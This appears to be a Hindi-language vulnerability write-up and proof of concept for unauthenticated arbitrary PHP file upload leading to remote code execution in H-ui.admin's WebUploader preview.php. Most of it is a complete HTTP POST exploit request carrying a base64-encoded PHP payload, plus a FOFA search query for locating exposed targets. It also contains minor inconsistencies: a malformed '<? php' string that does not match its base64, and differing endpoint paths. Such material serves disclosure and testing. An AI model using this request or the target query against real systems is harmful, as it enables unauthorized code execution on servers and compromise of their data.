
एक रिमोट कोड निष्पादन भेद्यता जो प्रमाणीकरण रहित हमलावरों को सीधे वेब सर्वर पर मनमानी PHP फ़ाइलें अपलोड करने की अनुमति देती है। इसके परिणामस्वरूप वेब सर्वर विशेषाधिकारों के साथ तत्काल रिमोट कोड निष्पादन होता है।
एक प्रूफ-ऑफ-कॉन्सेप्ट जो मनमाना फ़ाइल अपलोड के माध्यम से वेब सर्वर विशेषाधिकारों के साथ रिमोट कोड निष्पादन का शोषण करता है।
H-ui.admin सिस्टम के WebUploader पूर्वावलोकन घटक में एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता मौजूद है। <font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> फ़ाइल में उचित प्रमाणीकरण और फ़ाइल सत्यापन का अभाव है, जिससे अप्रमाणित हमलावर सीधे वेब सर्वर पर मनमानी PHP फ़ाइलें अपलोड कर सकते हैं। इसके परिणामस्वरूप वेब सर्वर विशेषाधिकारों के साथ तत्काल रिमोट कोड निष्पादन होता है।
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+

FOFA:
title='Tpadmin'
एक अप्रमाणित दूरस्थ हमलावर Arbitrary File Upload का उपयोग करके वेब सर्वर विशेषाधिकारों के साथ RCE प्राप्त कर सकता है।
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium
संभावित प्रतिउपायों के बारे में कोई जानकारी उपलब्ध नहीं है। प्रभावित वस्तु को किसी वैकल्पिक उत्पाद से बदलने का सुझाव दिया जा सकता है।
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुँच अवैध है।